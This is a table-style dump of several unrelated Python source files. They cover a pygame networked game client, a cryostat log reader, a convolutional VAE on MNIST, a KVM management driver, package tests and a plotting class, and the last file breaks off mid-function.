content stringlengths 5 1.05M |
|---|
# Written by Måns Andersson
import pygame
import sys
import socket
import json
import threading
pygame.init()

# Entire client-side view of the game. The listener thread overwrites these
# keys with whatever the server sends; the render loop reads them.
# NOTE(review): there is no explicit locking between the two threads --
# dict.update of top-level keys is relied on to be atomic under the GIL.
state = {
    "players": [],
    "blockades": [],
    "bombs": [],
    "snowflakes": [],
    "placed_bombs": [],
    "explosions": [],
    "winner": -1,  # -1 means the game is still in progress
}

# Initialize the window and load all image assets up front.
screen = pygame.display.set_mode((800, 800), pygame.DOUBLEBUF)
player_image_1 = pygame.image.load("assets/player1.png").convert_alpha()
player_image_2 = pygame.image.load("assets/player2.png").convert_alpha()
player_image_3 = pygame.image.load("assets/player3.png").convert_alpha()
player_image_4 = pygame.image.load("assets/player4.png").convert_alpha()
block_image = pygame.image.load("assets/block.png").convert_alpha()
gift_image = pygame.image.load("assets/gift.png").convert_alpha()
bomb_image = pygame.image.load("assets/bomb.png").convert_alpha()
damaged_image = pygame.image.load("assets/damaged.png").convert_alpha()
frozen_image = pygame.image.load("assets/frozen.png").convert_alpha()
snowflake_image = pygame.image.load("assets/snowflake.png").convert_alpha()
dead_image = pygame.image.load("assets/dead.png").convert_alpha()
explosion_image = pygame.image.load("assets/explosion.png").convert_alpha()
victory_text = pygame.image.load("assets/victory_text.png").convert_alpha()
# Index in this list corresponds to the player's id.
player_images = [player_image_1, player_image_2, player_image_3, player_image_4]

# Establish connection to the server; an exception here is intentionally
# fatal, since the client is useless without a connection.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080))

# Timestamp (ms) of the last input sample; used by keypress() to rate-limit.
last_update = pygame.time.get_ticks()
def main():
    """Run the client loop forever: pump events, sample input, draw a frame."""
    while True:
        for step in (events, keypress, render):
            step()
def listener():
    """Receive state frames from the server forever and merge them into `state`.

    Runs in a separate daemon thread. A frame that cannot be parsed is logged
    and skipped. (The original fell through after a parse failure and called
    `state.update(parsed)` with a stale -- or on the first frame undefined --
    `parsed` value, masked by a bare except.)
    """
    while True:
        new_state = receive_state()
        try:
            parsed = json.loads(new_state)
        except ValueError:  # json.JSONDecodeError subclasses ValueError
            print("Couldn't parse json")
            continue  # skip this frame; do not touch state
        try:
            state.update(parsed)
        except (TypeError, ValueError):
            # Valid JSON but not a mapping (e.g. a bare list or number).
            print("Couldn't load data into state")
# Helper for listener(): blocks until one complete message is available.
def receive_state():
    """Read from the socket until a complete ';'-delimited message arrives.

    Returns the first non-empty chunk strictly between the first and last
    ';' separators seen so far.
    NOTE(review): any additional complete messages still in `buffer` are
    discarded when the function returns -- presumably acceptable because only
    the latest state matters, but worth confirming against the server's
    send rate.
    """
    buffer = ""
    while True:
        buffer += s.recv(1024).decode("utf-8")
        result = buffer.split(";")
        # len > 2 guarantees at least one fully-delimited chunk exists
        # between the first and last separator.
        if len(result) > 2:
            for res in result[1 : len(result) - 1]:
                if len(res) > 0:
                    return res
def render():
    """Draw everything described by `state` onto the screen, then flip."""
    screen.fill((0, 0, 0))
    if state["winner"] != -1:
        # Someone won: show only the victory screen.
        render_victory_message(state["winner"])
        return
    for player in state["players"]:
        render_player(player["id"])
    for blockade in state["blockades"]:
        screen.blit(block_image, (blockade["x_pos"] - 25, blockade["y_pos"] - 25))
    # Each entity list whose items carry a "spawned" flag, with its sprite
    # and the offset that centers that sprite on the entity's position.
    spawnables = (
        ("bombs", gift_image, 25),
        ("placed_bombs", bomb_image, 25),
        ("snowflakes", snowflake_image, 25),
        ("explosions", explosion_image, 100),
    )
    for key, image, offset in spawnables:
        for item in state[key]:
            if item["spawned"]:
                screen.blit(image, (item["x_pos"] - offset, item["y_pos"] - offset))
    pygame.display.update()
def render_player(id):
    """Draw one player sprite, picking the image that matches their status.

    Dead takes priority over damaged, which takes priority over stunned;
    otherwise the player's own per-id sprite is used.
    """
    player = state["players"][id]
    if not player["spawned"]:
        return
    if player["dead"]:
        image = dead_image
    elif player["damage_taken"]:
        image = damaged_image
    elif player["stunned"]:
        image = frozen_image
    else:
        image = player_images[id]
    screen.blit(image, (player["x_pos"] - 50, player["y_pos"] - 50))
def render_victory_message(winnerID):
    """Show the winning player's sprite above the victory banner and flip."""
    winner_sprite = player_images[winnerID]
    screen.blit(winner_sprite, (350, 350))
    screen.blit(victory_text, (100, 460))
    pygame.display.update()
def events():
    """Drain the pygame event queue; shut down cleanly when the window closes."""
    for event in pygame.event.get():
        if event.type != pygame.QUIT:
            continue
        pygame.quit()
        sys.exit()
def keypress():
    """Sample held keys at most once every 16 ms and send the first match.

    Exactly one action is sent per sample; the binding order below preserves
    the original priority (up, left, down, right, space).
    """
    global last_update
    now = pygame.time.get_ticks()
    if now - last_update < 16:
        return
    last_update = now
    pressed = pygame.key.get_pressed()
    bindings = (
        (pygame.K_UP, b'{ "action":"up"};'),
        (pygame.K_LEFT, b'{ "action":"left"};'),
        (pygame.K_DOWN, b'{ "action":"down"};'),
        (pygame.K_RIGHT, b'{ "action":"right"};'),
        (pygame.K_SPACE, b'{ "action":"space"};'),
    )
    for key, message in bindings:
        if pressed[key]:
            s.sendall(message)
            break
if __name__ == "__main__":
    # Run the network listener on a daemon thread so it dies with the
    # main loop instead of keeping the process alive after the window closes.
    l = threading.Thread(target=listener, args=(), daemon=True)
    l.start()
    main()
|
from aiosql_mysql.adapters.pymysql import PyMySQLAdaptor
from aiosql_mysql.adapters.asyncmy import AsyncMySQLAdapter |
#!/usr/bin/env python
import argparse
import os
import shutil
def parse_args():
    """Build the CLI parser and evaluate sys.argv.

    --check-basename takes N paths followed by their N expected basenames
    and may be given repeatedly; --copy takes one or more sources followed
    by a destination and may also be given repeatedly.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--check-basename",
        nargs="+",
        action="append",
        metavar=("PATH ...", "BASE"),
    )
    parser.add_argument(
        "--copy",
        nargs="+",
        action="append",
        metavar=("SRC", "DEST"),
    )
    return parser.parse_args()
def main():
    """Validate basenames and copy files as described by the CLI arguments.

    Each --check-basename group lists N paths followed by their N expected
    basenames; each --copy group lists one or more sources followed by a
    destination.
    """
    args = parse_args()
    # BUGFIX: argparse leaves an unused action="append" option as None, not
    # [], so iterating args.check_basename / args.copy directly raised
    # TypeError whenever only one of the two flags was given.
    for check in args.check_basename or []:
        # The first half of the arguments are paths, the second are basenames.
        half = len(check) // 2
        paths = check[:half]
        basenames = check[half:]
        assert len(paths) == len(basenames), "All paths must have a corresponding basename"
        for path, basename in zip(paths, basenames):
            assert os.path.basename(path) == basename, \
                "basename of '%s' is not equal to '%s'" % (path, basename)
    for copy in args.copy or []:
        assert len(copy) >= 2, "At least one source and destination required"
        srcs = copy[:-1]
        dest = copy[-1]
        assert len(srcs) == 1 or os.path.isdir(dest), \
            "Destination must be an existing directory when copying multiple sources"
        for src in srcs:
            shutil.copy(src, dest)


if __name__ == "__main__":
    main()
|
'''Reading Dilution Status'''
from pathlib import Path
from datetime import datetime
from time import mktime
from os import listdir
from numpy import diff
from pyqum.instrument.analyzer import derivative, curve
class bluefors:
    """Browse BlueFors dilution-refrigerator log files from the shared log drive.

    Log files live in one sub-directory per day under the UNC share; pressure
    and temperature readers parse the fixed-format CSV-ish log lines into
    hours-since-start time axes.
    """

    def __init__(self):
        # UNC path of the BlueFors log share; one sub-directory per day.
        self.LogPath = Path(r'\\BLUEFORSAS\BlueLogs')
        self.Days = listdir(self.LogPath)

    def whichday(self):
        """Ask interactively which logged day to inspect; return its 0-based index."""
        total = len(self.Days)
        for i, day in enumerate(self.Days):
            print("%s. %s" % (i + 1, day))
        while True:
            try:
                k = int(input("Which day would you like to check out (1-%s): " % total))
                if k - 1 in range(total):
                    break
            except ValueError:
                print("Bad index. Please use numeric!")
        return k - 1

    def selectday(self, index):
        """Select the day at `index` (0-based); report out-of-range indices instead of raising."""
        try:
            self.Date = self.Days[index]
            print("Date selected: %s" % self.Date)
        except IndexError:
            # BUGFIX: list indexing raises IndexError, not ValueError, so the
            # original `except ValueError` never caught an out-of-range index.
            print("index might be out of range")

    def pressure(self, Channel):
        """Return (start time, hours since start, pressures, gauge status) for one maxigauge channel."""
        LogFile = self.LogPath / self.Date / ("maxigauge " + self.Date + ".log")
        with open(LogFile, 'r') as L:
            L = L.read()
        Plog = L.split('\n')[:-1]
        Plog = [x for x in Plog if ',,' not in x]  # filter out bad log lines
        t = [datetime.strptime(x.split("CH")[0][:-1].split(',')[1], '%H:%M:%S') for x in Plog]
        startime = t[0].strftime('%H:%M:%S')
        t = [(x - t[0]).total_seconds() / 3600 for x in t]
        # Fixed-width record per channel: chars 14:21 hold the reading,
        # char 11 the status flag.
        P = [float(x.split("CH")[Channel][14:21]) for x in Plog]
        P_stat = [int(x.split("CH")[Channel][11]) for x in Plog]
        return startime, t, P, P_stat

    def temperature(self, Channel):
        """Return (start time, hours since start, temperatures) for one thermometer channel."""
        LogFile = self.LogPath / self.Date / ("CH%s T " % Channel + self.Date + ".log")
        with open(LogFile, 'r') as L:
            L = L.read()
        Tlog = list([x.split(',') for x in L.split('\n')[:-1]])
        t, T = [datetime.strptime(x[1], '%H:%M:%S') for x in Tlog], [float(x[2]) for x in Tlog]
        startime = t[0].strftime('%H:%M:%S')
        t = [(x - t[0]).total_seconds() / 3600 for x in t]
        return startime, t, T
def test():
    """Smoke-test: pick a day interactively, plot pressure, temperature and dT/dt."""
    b = bluefors()
    b.selectday(b.whichday())
    # Channel 6 pressure vs time.
    P = b.pressure(6)
    curve(P[1], P[2], "Starting %s" % P[0], "t(hr)", "P(mbar)")
    # Channel 1 temperature vs time, plus its smoothed derivative.
    T = b.temperature(1)
    curve(T[1], T[2], "Starting %s" % T[0], "t(hr)", "T(K)")
    t, dTdt = derivative(T[1], T[2], 3)
    curve(t, dTdt, "Starting %s" % T[0], "t(hr)", "dT/dt(K)")


# Runs the interactive smoke test on import/execution.
test()
#!/usr/bin/env python
"""
@author: Dan Salo, Jan 2017
Purpose: Implement Convolutional Variational Autoencoder for Semi-Supervision with partially-labeled MNIST dataset.
MNIST Dataset will be downloaded and batched automatically.
"""
from tensorbase.base import Model, Layers
from tensorbase.data import Mnist
from scipy.misc import imsave
import sys
import tensorflow as tf
import numpy as np
import math
# Global dictionary of flags: all run configuration in one place.
flags = {
    'data_directory': 'MNIST_data/',  # where the MNIST files are downloaded
    'save_directory': 'summaries/',   # TensorBoard summary root
    'model_directory': 'conv_vae/',   # model-specific subdirectory
    'restore': False,                 # restore weights from restore_file?
    'restore_file': 'start.ckpt',
    'datasets': 'MNIST',
    'image_dim': 28,                  # MNIST images are 28x28
    'hidden_size': 10,                # dimensionality of the latent code z
    'num_classes': 10,
    'batch_size': 100,
    'display_step': 200,              # record metrics every N batches
    'weight_decay': 1e-6,
    'learning_rate': 0.001,
    'epochs': 100,
    'run_num': 1,                     # overwritten from argv in main()
}
class ConvVae(Model):
    """Convolutional variational autoencoder for MNIST (TensorFlow v1 style).

    The encoder maps an image to a (mean, stddev) pair of size `hidden_size`;
    the decoder reconstructs the image from a reparameterized sample.
    Session, summary-merging, step counting, logging and checkpoint helpers
    (self.sess, self.merged, self.step, print_log, _record_training_step,
    _save_model) are provided by the tensorbase `Model` base class.
    """

    def __init__(self, flags_input, run_num):
        super().__init__(flags_input, run_num)

    def _data(self):
        """Define data I/O: image placeholder, latent-noise placeholder, MNIST loader."""
        self.x = tf.placeholder(tf.float32, [None, flags['image_dim'], flags['image_dim'], 1], name='x')
        self.epsilon = tf.placeholder(tf.float32, [None, flags['hidden_size']], name='epsilon')
        self.data = Mnist(self.flags)

    def _summaries(self):
        """Define TensorBoard summaries for losses, latent moments and images."""
        tf.summary.scalar("Total_Loss", self.cost)
        tf.summary.scalar("Reconstruction_Loss", self.recon)
        tf.summary.scalar("VAE_Loss", self.vae)
        tf.summary.scalar("Weight_Decay_Loss", self.weight)
        tf.summary.histogram("Mean", self.mean)
        tf.summary.histogram("Stddev", self.stddev)
        tf.summary.image("x", self.x)
        tf.summary.image("x_hat", self.x_hat)

    def _encoder(self, x):
        """Define the q(z|x) network; output has 2*hidden_size channels (mean, log-var)."""
        encoder = Layers(x)
        encoder.conv2d(5, 64)
        encoder.maxpool()
        encoder.conv2d(3, 64)
        encoder.conv2d(3, 64)
        encoder.conv2d(3, 128, stride=2)
        encoder.conv2d(3, 128)
        encoder.conv2d(1, 64)
        encoder.conv2d(1, self.flags['hidden_size'] * 2, activation_fn=None)
        encoder.avgpool(globe=True)
        return encoder.get_output()

    def _decoder(self, z):
        """Define the p(x|z) network.

        With z=None the decoder samples directly from the prior through
        self.epsilon (pure generation); otherwise z is split into mean and
        stddev for the reparameterization trick.
        """
        if z is None:
            mean = None
            stddev = None
            input_sample = self.epsilon
        else:
            z = tf.reshape(z, [-1, self.flags['hidden_size'] * 2])
            print(z.get_shape())
            mean, stddev = tf.split(1, 2, z)
            # Encoder emits a log-variance; convert it to a positive stddev.
            stddev = tf.sqrt(tf.exp(stddev))
            input_sample = mean + self.epsilon * stddev
        decoder = Layers(tf.expand_dims(tf.expand_dims(input_sample, 1), 1))
        decoder.deconv2d(3, 128, padding='VALID')
        decoder.deconv2d(3, 128, padding='VALID', stride=2)
        decoder.deconv2d(3, 64, stride=2)
        decoder.deconv2d(3, 64, stride=2)
        decoder.deconv2d(5, 1, activation_fn=tf.nn.tanh, s_value=None)
        return decoder.get_output(), mean, stddev

    def _network(self):
        """Wire encoder -> decoder, plus a weight-sharing generative decoder."""
        with tf.variable_scope("model"):
            self.latent = self._encoder(x=self.x)
            self.x_hat, self.mean, self.stddev = self._decoder(z=self.latent)
        with tf.variable_scope("model", reuse=True):
            self.x_gen, _, _ = self._decoder(z=None)

    def _optimizer(self):
        """Define reconstruction/KL/weight-decay losses and the Adam optimizer."""
        epsilon = 1e-8  # avoids log(0) in the KL term
        const = 1 / (self.flags['batch_size'] * self.flags['image_dim'] * self.flags['image_dim'])
        self.recon = const * tf.reduce_sum(tf.squared_difference(self.x, self.x_hat))
        self.vae = const * -0.5 * tf.reduce_sum(1.0 - tf.square(self.mean) - tf.square(self.stddev) + 2.0 * tf.log(self.stddev + epsilon))
        self.weight = self.flags['weight_decay'] * tf.add_n(tf.get_collection('weight_losses'))
        self.cost = tf.reduce_sum(self.vae + self.recon + self.weight)
        self.optimizer = tf.train.AdamOptimizer(learning_rate=self.flags['learning_rate']).minimize(self.cost)

    def _generate_train_batch(self):
        """Fetch the next training batch and fresh N(0,1) noise for epsilon."""
        self.train_batch_y, self.train_batch_x = self.data.next_train_batch(self.flags['batch_size'])
        self.norm = np.random.standard_normal([self.flags['batch_size'], self.flags['hidden_size']])

    def _run_train_iter(self):
        """Run one training step; return the merged summary."""
        summary, _ = self.sess.run([self.merged, self.optimizer],
                                   feed_dict={self.x: self.train_batch_x, self.epsilon: self.norm})
        return summary

    def _run_train_metrics_iter(self):
        """Run one training step and also fetch the loss and reconstructions."""
        summary, self.loss, self.x_recon, _ = \
            self.sess.run([self.merged, self.cost, self.x_hat, self.optimizer],
                          feed_dict={self.x: self.train_batch_x, self.epsilon: self.norm})
        return summary

    def _record_train_metrics(self):
        """Save an input/reconstruction image pair and log the current loss."""
        # NOTE(review): 'restore_directory' is not defined in the flags dict
        # above; presumably the tensorbase Model base class adds it -- confirm.
        for j in range(1):
            imsave(self.flags['restore_directory'] + 'x_' + str(self.step) + '.png', np.squeeze(self.train_batch_x[j]))
            imsave(self.flags['restore_directory'] + 'x_recon_' + str(self.step) + '.png', np.squeeze(self.x_recon[j]))
        self.print_log("Batch Number: " + str(self.step) + ", Image Loss= " + "{:.6f}".format(self.loss))

    def train(self):
        """Train the autoencoder, recording metrics every display_step batches."""
        # BUGFIX: '%d' truncated fractional learning rates (0.001 printed as 0).
        self.print_log('Learning Rate: %g' % self.flags['learning_rate'])
        iters = self.flags['epochs'] * self.data.num_train_images
        self.print_log('Iterations: %d' % iters)
        for i in range(iters):
            print('Batch number: %d' % self.step)
            self._generate_train_batch()
            if self.step % self.flags['display_step'] != 0:
                summary = self._run_train_iter()
            else:
                summary = self._run_train_metrics_iter()
                self._record_train_metrics()
            self._record_training_step(summary)
        # Checkpoint once after training completes.
        self._save_model(section=i)
def main():
    """Entry point: pick a random seed, read the run number from argv, train."""
    flags['seed'] = np.random.randint(1, 1000, 1)[0]
    # Keep taking the run number from the command line, but fall back to the
    # flags default instead of crashing with IndexError when it is absent.
    if len(sys.argv) > 1:
        flags['run_num'] = sys.argv[1]
    model_vae = ConvVae(flags, run_num=flags['run_num'])
    model_vae.train()


if __name__ == "__main__":
    main()
|
from traceback import format_exc
from urlparse import urlparse
from telnetlib import Telnet
import httplib
import sys
try:
import simplejson as json
except ImportError:
import json
from basicserver import BasicVirtualServer
from clusto.exceptions import DriverException
import clusto
class KVMVirtualServer(BasicVirtualServer):
    """Clusto driver that manages a KVM virtual machine through the REST API
    exposed on port 3000 of its allocated hypervisor."""

    _driver_name = "kvmvirtualserver"

    def __init__(self, name, **kwargs):
        BasicVirtualServer.__init__(self, name, **kwargs)

    def get_hypervisor(self):
        """Return the hypervisor allocated to this VM; raise if none is allocated."""
        from clusto.drivers import VMManager
        host = VMManager.resources(self)
        if not host:
            raise DriverException('Cannot start a VM without first allocating a hypervisor')
        return host[0].value

    def _request(self, method, endpoint, body=None):
        """Send one HTTP request to the hypervisor agent; return (status, body text)."""
        host = self.get_hypervisor().get_ips()[0]
        conn = httplib.HTTPConnection(host, 3000)
        if body:
            body = json.dumps(body, indent=2, sort_keys=True)
        conn.request(method, endpoint, body)
        response = conn.getresponse()
        return (response.status, response.read())

    def kvm_create(self, options):
        """Create the VM on the hypervisor and record its config in clusto."""
        status, response = self._request('POST', '/api/1/%s' % self.name, {
            'memory': options.memory,
            'disk': options.disk,
        })
        if status != 200:
            raise DriverException(response)
        response = json.loads(response)
        config = response['config']
        try:
            clusto.begin_transaction()
            self.set_attr(key='system', subkey='memory', value=config['memory'])
            self.set_attr(key='system', subkey='disk', value=config['disk'])
            self.set_attr(key='system', subkey='cpucount', value=1)
            self.set_attr(key='kvm', subkey='console-port', value=config['console'])
            self.set_attr(key='kvm', subkey='vnc-port', value=5900 + config['vnc'])
            self.set_port_attr('nic-eth', 1, 'mac', config['mac'])
            self.set_port_attr('nic-eth', 1, 'model', config['nic'])
            clusto.SESSION.clusto_description = 'Populate KVM information for %s' % self.name
            clusto.commit()
        except Exception:
            # Best effort: log the traceback and roll back rather than leave a
            # half-populated transaction. (Was a bare `except:`, which also
            # swallowed KeyboardInterrupt/SystemExit.)
            sys.stderr.write(format_exc() + '\n')
            clusto.rollback_transaction()

    def kvm_update(self, options):
        """Push this VM's recorded memory/disk/NIC config back to the hypervisor."""
        attr = dict([(x.subkey, x.value) for x in self.attrs(key='system')])
        status, response = self._request('PUT', '/api/1/%s' % self.name, {
            'memory': attr['memory'],
            'disk': attr['disk'],
            'mac': self.get_port_attr('nic-eth', 1, 'mac'),
            'nic': self.get_port_attr('nic-eth', 1, 'model'),
        })
        # NOTE(review): unlike every other call this expects 201 -- confirm the
        # agent really answers 201 Created for PUT updates.
        if status != 201:
            raise DriverException(response)

    def kvm_delete(self, options):
        """Delete the VM on the hypervisor."""
        status, response = self._request('DELETE', '/api/1/%s' % self.name)
        if status != 200:
            raise DriverException(response)

    def kvm_status(self, options):
        """Return the VM's state string as reported by the hypervisor."""
        status, response = self._request('GET', '/api/1/%s' % self.name)
        if status != 200:
            raise DriverException(response)
        response = json.loads(response)
        return response['state']

    def kvm_start(self, options):
        """Start the VM and verify it reaches the RUNNING state."""
        status, response = self._request('POST', '/api/1/%s/start' % self.name)
        if status != 200:
            raise DriverException(response)
        response = json.loads(response)
        if response['state'] != 'RUNNING':
            raise DriverException('VM is not in the RUNNING state after starting')

    def kvm_stop(self, options):
        """Stop the VM and verify it reaches the STOPPED state."""
        status, response = self._request('POST', '/api/1/%s/stop' % self.name)
        if status != 200:
            raise DriverException(response)
        response = json.loads(response)
        if response['state'] != 'STOPPED':
            raise DriverException('VM is not in the STOPPED state after stopping')

    def kvm_console(self, options):
        """Open an interactive telnet session to the VM's serial console."""
        # BUGFIX: the console port is stored under subkey 'console-port' in
        # kvm_create(); reading subkey 'console' never found the attribute.
        client = Telnet(self.get_hypervisor().get_ips()[0],
                        self.attr_value(key='kvm', subkey='console-port'))
        client.interact()
|
import pytest
try:
    # Optional dependency: if jupyter-server-mathjax is importable, its static
    # assets path enables the bundled-MathJax excursions below.
    from jupyter_server_mathjax.app import STATIC_ASSETS_PATH
    HAS_JSMX = True
except Exception:  # pragma: no cover
    STATIC_ASSETS_PATH = None
    HAS_JSMX = False

# Each excursion is [should MathJax.js appear in the output?, extra CLI args].
EXCURSIONS = [
    [False, ["--ignore-sys-prefix"]],
    [False, ["--disable-addons", "mathjax"]],
]

if STATIC_ASSETS_PATH:
    EXCURSIONS += [
        [True, None],
        [True, ["--mathjax-dir", STATIC_ASSETS_PATH]],
    ]
@pytest.mark.parametrize("expected,extra_args", EXCURSIONS)
def test_mathjax(
    an_empty_lite_dir,
    script_runner,
    extra_args,
    expected,
):
    """does bundled mathjax work?"""
    # An excursion may carry None for "no extra args".
    extra_args = extra_args or []
    kwargs = dict(cwd=str(an_empty_lite_dir))
    # status / build / check are three separate CLI invocations; all must pass.
    status = script_runner.run("jupyter", "lite", "status", *extra_args, **kwargs)
    assert status.success, "the status did NOT succeed"
    build = script_runner.run("jupyter", "lite", "build", *extra_args, **kwargs)
    assert build.success, "the build did NOT succeed"
    # Depending on the excursion, the build either ships MathJax.js into the
    # static output or leaves it out.
    mathjax_path = (
        an_empty_lite_dir / "_output/static/jupyter_server_mathjax/MathJax.js"
    )
    if expected:
        assert mathjax_path.exists(), f"{mathjax_path} was expected"
    else:
        assert not mathjax_path.exists(), f"{mathjax_path} was NOT expected"
    check = script_runner.run("jupyter", "lite", "check", *extra_args, **kwargs)
    assert check.success, "the build did NOT check out"
|
import pytest
import numpy as np
from pipex import H5Storage, channel_map, map, source, PRecord
def test_h5storage():
    """Round-trip: values with an attached image channel survive an H5 bucket."""
    storage = H5Storage("/tmp")
    image = np.array([[0, 0], [0, 0]], dtype=np.uint8)
    bucket = storage['pipex_test/test_pstorage']
    # Pipeline: three values, each given an 'image' channel, written to the bucket.
    pl = [1, 2, 3] >> channel_map('image', lambda _: image) >> bucket
    pl.do()
    restored = list(bucket)
    assert len(restored) == 3
    for precord in restored:
        assert np.all(precord['image'] == image)
    # Restoration order is not asserted, so compare as a set.
    assert set(precord.value for precord in restored) == set([1, 2, 3])
def test_h5bucket_skipping(mocker):
    """A source whose data version is unchanged is not re-generated on a second run."""
    class TestSource(source):
        def __init__(self):
            # Counts how many times generate() was invoked.
            self.counter = 0

        def generate(self):
            self.counter += 1
            yield from [1, 2, 3]

        def fetch_source_data_version(self, our):
            from pipex.pbase import SourceDataVersion
            # A constant hash lets downstream buckets treat the data as unchanged.
            return SourceDataVersion(data_hash="")

    storage = H5Storage("/tmp")
    bucket = storage['pipex_test/test_pstorage']
    bucket_2 = storage['pipex_test/test_pstorage_2']
    test_source = TestSource()
    pl = test_source >> bucket >> map(lambda x: x + 1) >> bucket_2
    pl.do()
    assert test_source.counter == 1
    pl.do()
    # should skip: second run must not call generate() again
    assert test_source.counter == 1
def test_h5_for_specific_ids():
    """Buckets can be read back selectively by record id."""
    storage = H5Storage("/tmp")
    bucket = storage['pipex_test/test_pstorage_3']
    precords = [
        PRecord.from_object(1, 'default', "id_1"),
        PRecord.from_object(2, 'default', "id_2"),
        PRecord.from_object(3, 'default', "id_3"),
    ]
    (precords >> bucket).do()
    # with_ids restricts iteration to the given ids, in the given order.
    assert list((bucket.with_ids(["id_2", "id_3"]) >> map(lambda x: x + 1)).values()) == [3, 4]
    # Unknown ids simply yield nothing.
    assert list(bucket.with_ids(["id_999"])) == []
|
import numpy as np
from typing import Callable
from autoarray.plot.abstract_plotters import Plotter
from autoarray.plot.mat_wrap.visuals import Visuals1D
from autoarray.plot.mat_wrap.visuals import Visuals2D
from autoarray.plot.mat_wrap.include import Include1D
from autoarray.plot.mat_wrap.include import Include2D
from autoarray.plot.mat_wrap.mat_plot import MatPlot1D
from autoarray.plot.mat_wrap.mat_plot import MatPlot2D
from autoarray.plot.mat_wrap.mat_plot import AutoLabels
from autoarray.fit.fit_dataset import FitInterferometer
class FitInterferometerPlotterMeta(Plotter):
def __init__(
self,
fit,
get_visuals_2d_real_space: Callable,
mat_plot_1d: MatPlot1D,
visuals_1d: Visuals1D,
include_1d: Include1D,
mat_plot_2d: MatPlot2D = MatPlot2D(),
visuals_2d: Visuals2D = Visuals2D(),
include_2d: Include2D = Include2D(),
):
"""
Plots the attributes of `FitInterferometer` objects using the matplotlib method `imshow()` and many
other matplotlib functions which customize the plot's appearance.
The `mat_plot_1d` and `mat_plot_2d` attributes wrap matplotlib function calls to make the figure. By default,
the settings passed to every matplotlib function called are those specified in
the `config/visualize/mat_wrap/*.ini` files, but a user can manually input values into `MatPlot2d` to
customize the figure's appearance.
Overlaid on the figure are visuals, contained in the `Visuals1D` and `Visuals2D` objects. Attributes may be
extracted from the `FitInterferometer` and plotted via the visuals object, if the corresponding entry is `True` in
the `Include1D` or `Include2D` object or the `config/visualize/include.ini` file.
Parameters
----------
fit
The fit to an interferometer dataset the plotter plots.
get_visuals_2d
A function which extracts from the `FitInterferometer` the 2D visuals which are plotted on figures.
mat_plot_1d
Contains objects which wrap the matplotlib function calls that make 1D plots.
visuals_1d
Contains 1D visuals that can be overlaid on 1D plots.
include_1d
Specifies which attributes of the `FitInterferometer` are extracted and plotted as visuals for 1D plots.
mat_plot_2d
Contains objects which wrap the matplotlib function calls that make 2D plots.
visuals_2d
Contains 2D visuals that can be overlaid on 2D plots.
include_2d
Specifies which attributes of the `FitInterferometer` are extracted and plotted as visuals for 2D plots.
"""
super().__init__(
mat_plot_1d=mat_plot_1d,
include_1d=include_1d,
visuals_1d=visuals_1d,
mat_plot_2d=mat_plot_2d,
include_2d=include_2d,
visuals_2d=visuals_2d,
)
self.fit = fit
self.get_visuals_2d_real_space = get_visuals_2d_real_space
def figures_2d(
self,
visibilities: bool = False,
noise_map: bool = False,
signal_to_noise_map: bool = False,
model_visibilities: bool = False,
residual_map_real: bool = False,
residual_map_imag: bool = False,
normalized_residual_map_real: bool = False,
normalized_residual_map_imag: bool = False,
chi_squared_map_real: bool = False,
chi_squared_map_imag: bool = False,
dirty_image: bool = False,
dirty_noise_map: bool = False,
dirty_signal_to_noise_map: bool = False,
dirty_model_image: bool = False,
dirty_residual_map: bool = False,
dirty_normalized_residual_map: bool = False,
dirty_chi_squared_map: bool = False,
):
"""
Plots the individual attributes of the plotter's `FitInterferometer` object in 1D and 2D.
The API is such that every plottable attribute of the `Interferometer` object is an input parameter of type
bool of the function, which if switched to `True` means that it is plotted.
Parameters
----------
visibilities
Whether or not to make a 2D plot (via `scatter`) of the visibility data.
noise_map
Whether or not to make a 2D plot (via `scatter`) of the noise-map.
signal_to_noise_map
Whether or not to make a 2D plot (via `scatter`) of the signal-to-noise-map.
model_visibilities
Whether or not to make a 2D plot (via `scatter`) of the model visibility data.
residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the residual map.
residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the residual map.
normalized_residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the normalized residual map.
normalized_residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the normalized residual map.
chi_squared_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the chi-squared map.
chi_squared_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the chi-squared map.
dirty_image
Whether or not to make a 2D plot (via `imshow`) of the dirty image.
dirty_noise_map
Whether or not to make a 2D plot (via `imshow`) of the dirty noise map.
dirty_model_image
Whether or not to make a 2D plot (via `imshow`) of the dirty model image.
dirty_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty residual map.
dirty_normalized_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty normalized residual map.
dirty_chi_squared_map
Whether or not to make a 2D plot (via `imshow`) of the dirty chi-squared map.
"""
if visibilities:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(title="Visibilities", filename="visibilities"),
color_array=np.real(self.fit.noise_map),
)
if noise_map:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(title="Noise-Map", filename="noise_map"),
color_array=np.real(self.fit.noise_map),
)
if signal_to_noise_map:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(
title="Signal-To-Noise Map", filename="signal_to_noise_map"
),
color_array=np.real(self.fit.signal_to_noise_map),
)
if model_visibilities:
self.mat_plot_2d.plot_grid(
grid=self.fit.visibilities.in_grid,
visuals_2d=self.visuals_2d,
auto_labels=AutoLabels(
title="Model Visibilities", filename="model_visibilities"
),
color_array=np.real(self.fit.model_data),
)
if residual_map_real:
self.mat_plot_1d.plot_yx(
y=np.real(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Residual Map vs UV-Distance (real)",
filename="real_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if residual_map_imag:
self.mat_plot_1d.plot_yx(
y=np.imag(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
